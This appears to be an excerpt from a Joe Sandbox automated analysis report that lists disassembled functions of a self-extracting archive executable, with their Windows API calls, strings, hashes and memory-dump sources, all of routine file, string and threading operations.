                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentVariable
                                                                          • String ID: sfxcmd$sfxpar
                                                                          • API String ID: 1431749950-3493335439
                                                                          • Opcode ID: 1508c8f968eb007309d4834e017f13bd63e7543bab300d0093301f85ba6167ee
                                                                          • Instruction ID: e470b8de2a9dec9668b5f2152a2992513fc1a75ff306bdc267ef6a8707b69edc
                                                                          • Opcode Fuzzy Hash: 1508c8f968eb007309d4834e017f13bd63e7543bab300d0093301f85ba6167ee
                                                                          • Instruction Fuzzy Hash: 42F0A7B2804238A6CB207B958C06FEA3769AF04B91B040815BD8595151D6F489C0F6E1
                                                                          Function 00F29A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: __alldvrm$_strrchr
                                                                          • String ID:
                                                                          • API String ID: 1036877536-0
                                                                          • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                          • Instruction ID: e3451b76a4befb30258737baeed0543bbb1183e0cd535ed358d83f73e30f6384
                                                                          • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                          • Instruction Fuzzy Hash: ECA16B72E483A69FEB15CF18E8917AEBBE5EF51320F14416DE4859B381C2B88D41E750
                                                                          Function 00F0A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00F07F69,?,?,?), ref: 00F0A3FA
                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00F07F69,?), ref: 00F0A43E
                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00F07F69,?,?,?,?,?,?,?), ref: 00F0A4BF
                                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00F07F69,?,?,?,?,?,?,?,?,?,?), ref: 00F0A4C6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Create$CloseHandleTime
                                                                          • String ID:
                                                                          • API String ID: 2287278272-0
                                                                          • Opcode ID: 6550f7df7bbd48615a0473c2f9e827a14d32f94115fefe78bdbeba1730c3bbea
                                                                          • Instruction ID: 3fb70c70d66819a032601fb46738867ac621d907cb11ca2e22172d9148e6c95e
                                                                          • Opcode Fuzzy Hash: 6550f7df7bbd48615a0473c2f9e827a14d32f94115fefe78bdbeba1730c3bbea
                                                                          • Instruction Fuzzy Hash: 3141DF356483819AD731DF24DC45FEEBBE5AB80310F04091DB5E1D31D0D6A99A48FB53
                                                                          Function 00F01100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID:
                                                                          • API String ID: 176396367-0
                                                                          • Opcode ID: 87d1a87698370aeb0a848a756230bab70711657aa8be73c5cc1fa7d159dd82f6
                                                                          • Instruction ID: e19662fd49e1654e4476b1e6ca11db53a9461b29e363b655b5e24ac9216f3499
                                                                          • Opcode Fuzzy Hash: 87d1a87698370aeb0a848a756230bab70711657aa8be73c5cc1fa7d159dd82f6
                                                                          • Instruction Fuzzy Hash: 2A41C571D0066A9BCB259F688C099EF7BB8EF01310F010019FD45F7245DF74AE999BA4
                                                                          Function 00F2C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00F291E0,?,00000000,?,00000001,?,?,00000001,00F291E0,?), ref: 00F2C9D5
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F2CA5E
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F26CBE,?), ref: 00F2CA70
                                                                          • __freea.LIBCMT ref: 00F2CA79
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                          • String ID:
                                                                          • API String ID: 2652629310-0
                                                                          • Opcode ID: cd96bad0d649bd13b621766754a51e8ade489bcaf5ef5088e3d9d64a5719fa7b
                                                                          • Instruction ID: c287bfd1d6be1b82e79f06db5e0b748cd73d2d007b4dde7de06dbed21946db53
                                                                          • Opcode Fuzzy Hash: cd96bad0d649bd13b621766754a51e8ade489bcaf5ef5088e3d9d64a5719fa7b
                                                                          • Instruction Fuzzy Hash: E031AE72A0022AABDB24DF65EC51DBE7BA5EF41720B044268FC04E7250E739DD54EBD0
                                                                          Function 00F1A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 00F1A666
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F1A675
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F1A683
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00F1A691
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: adf4beea053fb26b228c55bf7950267745d60c11e84f628e75b0421f37271ff5
                                                                          • Instruction ID: 95a1173e27a980d301ed32391f1fff97f3f4f9894f95403aab56299b9484af83
                                                                          • Opcode Fuzzy Hash: adf4beea053fb26b228c55bf7950267745d60c11e84f628e75b0421f37271ff5
                                                                          • Instruction Fuzzy Hash: 11E01231E46725FBD3615B60BC0DBCF3E54AB16B96F010105FE15961E0DBB48609ABA1
                                                                          Function 00F1A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F1A699: GetDC.USER32(00000000), ref: 00F1A69D
                                                                            • Part of subcall function 00F1A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F1A6A8
                                                                            • Part of subcall function 00F1A699: ReleaseDC.USER32(00000000,00000000), ref: 00F1A6B3
                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00F1A83C
                                                                            • Part of subcall function 00F1AAC9: GetDC.USER32(00000000), ref: 00F1AAD2
                                                                            • Part of subcall function 00F1AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00F1AB01
                                                                            • Part of subcall function 00F1AAC9: ReleaseDC.USER32(00000000,?), ref: 00F1AB99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectRelease$CapsDevice
                                                                          • String ID: (
                                                                          • API String ID: 1061551593-3887548279
                                                                          • Opcode ID: f6161f0722a6e1e90f2e68518063a6f0e77b73f520665a5fd26d3ee3d5f70b4a
                                                                          • Instruction ID: 04511a72d0ef83b8f313de9964a0fdbcdc1530f8c9ff6697554462f600eff2b0
                                                                          • Opcode Fuzzy Hash: f6161f0722a6e1e90f2e68518063a6f0e77b73f520665a5fd26d3ee3d5f70b4a
                                                                          • Instruction Fuzzy Hash: 8A91FF71608344AFD710DF25C844A6BBBE9FFC9721F00491EF99AD3260DB70A946DB62
                                                                          Function 00F075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F075E3
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                            • Part of subcall function 00F0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A598
                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F0777F
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A501
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A532
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                          • String ID: :
                                                                          • API String ID: 3226429890-336475711
                                                                          • Opcode ID: a20ea471d17192e12789320969905d80e7df356fdd5894ab6bb901159afce633
                                                                          • Instruction ID: 84981f963291fdb4e09a9244a2c259c4e7bd63866105ff2c74e7e0f12b488440
                                                                          • Opcode Fuzzy Hash: a20ea471d17192e12789320969905d80e7df356fdd5894ab6bb901159afce633
                                                                          • Instruction Fuzzy Hash: E5416F71D05258A9EB25EB64CC55EEEB77DAF41300F0040D6B60AA20D2DBB85F85FF61
                                                                          Function 00F1B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID: }
                                                                          • API String ID: 176396367-4239843852
                                                                          • Opcode ID: b4a509c7c243c787e776bc96130e98131a73c8cb71e10c3d46dcf5b470e2f406
                                                                          • Instruction ID: f3fcce71c23cda20cc7a0803b628f163a241ab176897d8c07a7cfd9ebcb5c2d6
                                                                          • Opcode Fuzzy Hash: b4a509c7c243c787e776bc96130e98131a73c8cb71e10c3d46dcf5b470e2f406
                                                                          • Instruction Fuzzy Hash: 7321D1729043169AD731EB64EC45AAAB3EDDF91760F08042AF580C3145EB68DD88A3A2
                                                                          Function 00F0F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F0F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0F2E4
                                                                            • Part of subcall function 00F0F2C5: GetProcAddress.KERNEL32(00F481C8,CryptUnprotectMemory), ref: 00F0F2F4
                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00F0F33E), ref: 00F0F3D2
                                                                          Strings
                                                                          • CryptUnprotectMemory failed, xrefs: 00F0F3CA
                                                                          • CryptProtectMemory failed, xrefs: 00F0F389
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CurrentProcess
                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                          • API String ID: 2190909847-396321323
                                                                          • Opcode ID: f7f49abea4f82f02e104a1efe734084ccfba23e9aec6b9642ce1bf66d4283fd3
                                                                          • Instruction ID: c3eecfd8de3a28820d3292627d22d9b30e51dba9ea5d103a288d3f5b83376c57
                                                                          • Opcode Fuzzy Hash: f7f49abea4f82f02e104a1efe734084ccfba23e9aec6b9642ce1bf66d4283fd3
                                                                          • Instruction Fuzzy Hash: 02112631A00229ABEF25AF20EC41A6E3B55FF41770B048126FC029B6D1DA34ED4AB691
                                                                          Function 00F0B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F0B9B8
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: __vswprintf_c_l_swprintf
                                                                          • String ID: %c:\
                                                                          • API String ID: 1543624204-3142399695
                                                                          • Opcode ID: abe21e974f33672eb3e3b05c291e92aa2da8ce820a9cae353d73974094ec95e6
                                                                          • Instruction ID: 2b039a5a96ae0124854e9d8d9b518c53e1934a1c65045013a56bf738cfce714a
                                                                          • Opcode Fuzzy Hash: abe21e974f33672eb3e3b05c291e92aa2da8ce820a9cae353d73974094ec95e6
                                                                          • Instruction Fuzzy Hash: A001F963600312B5DA30AB359C45D6BB7ACDE95770B40480AF944D60C2EB28D844F2B1
                                                                          Function 00F1101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNEL32(00000000,00010000,00F11160,?,00000000,00000000), ref: 00F11043
                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00F1108A
                                                                            • Part of subcall function 00F06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06C54
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                          • String ID: CreateThread failed
                                                                          • API String ID: 2655393344-3849766595
                                                                          • Opcode ID: cf7c5ef1ef61123bfa5310ca6055ff9f827757b1b5eedd07257de2d566a477dd
                                                                          • Instruction ID: 260377cc344e385bd687f1430eab03c72758b5ee712e7d2c2fa3fa46243e2c06
                                                                          • Opcode Fuzzy Hash: cf7c5ef1ef61123bfa5310ca6055ff9f827757b1b5eedd07257de2d566a477dd
                                                                          • Instruction Fuzzy Hash: 2C012BB574030D6BD3349E249C51FB67758FB44361F10002EFA87961C0CAA0A8C5B620
                                                                          Function 00F01316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F0E2E8: _swprintf.LIBCMT ref: 00F0E30E
                                                                            • Part of subcall function 00F0E2E8: _strlen.LIBCMT ref: 00F0E32F
                                                                            • Part of subcall function 00F0E2E8: SetDlgItemTextW.USER32(?,00F3E274,?), ref: 00F0E38F
                                                                            • Part of subcall function 00F0E2E8: GetWindowRect.USER32(?,?), ref: 00F0E3C9
                                                                            • Part of subcall function 00F0E2E8: GetClientRect.USER32(?,?), ref: 00F0E3D5
                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                          • SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                          • String ID: 0
                                                                          • API String ID: 2622349952-4108050209
                                                                          • Opcode ID: c9140191ece761d8802e0fde5971201154ad4e17af153dfbe64a7c21ac9e7948
                                                                          • Instruction ID: da869a711bba8d324594ad0e885890a52d7db79da6bec5bc6d59db999f6ae752
                                                                          • Opcode Fuzzy Hash: c9140191ece761d8802e0fde5971201154ad4e17af153dfbe64a7c21ac9e7948
                                                                          • Instruction Fuzzy Hash: D1F04F7094438CAADF151F648C0DBEA3F59BF45365F048514FC84555E2CB7AC994FA50
                                                                          Function 00F10FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00F11206,?), ref: 00F10FEA
                                                                          • GetLastError.KERNEL32(?), ref: 00F10FF6
                                                                            • Part of subcall function 00F06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06C54
                                                                          Strings
                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F10FFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                          • API String ID: 1091760877-2248577382
                                                                          • Opcode ID: 99431bd22a9430f40dc62ff2d8abf0f86a76f2e9d1e747d8e1390d4969bf01d4
                                                                          • Instruction ID: 3054c968dbdf3d5170fb795b88dc8652e463a27dbe04febc04d1997f2046f058
                                                                          • Opcode Fuzzy Hash: 99431bd22a9430f40dc62ff2d8abf0f86a76f2e9d1e747d8e1390d4969bf01d4
                                                                          • Instruction Fuzzy Hash: 9AD02B7190453436D61033249D05C6E3C05DB11332F104704F138912E6CA1849D17692
                                                                          Function 00F0E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00F0DA55,?), ref: 00F0E2A3
                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F0DA55,?), ref: 00F0E2B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
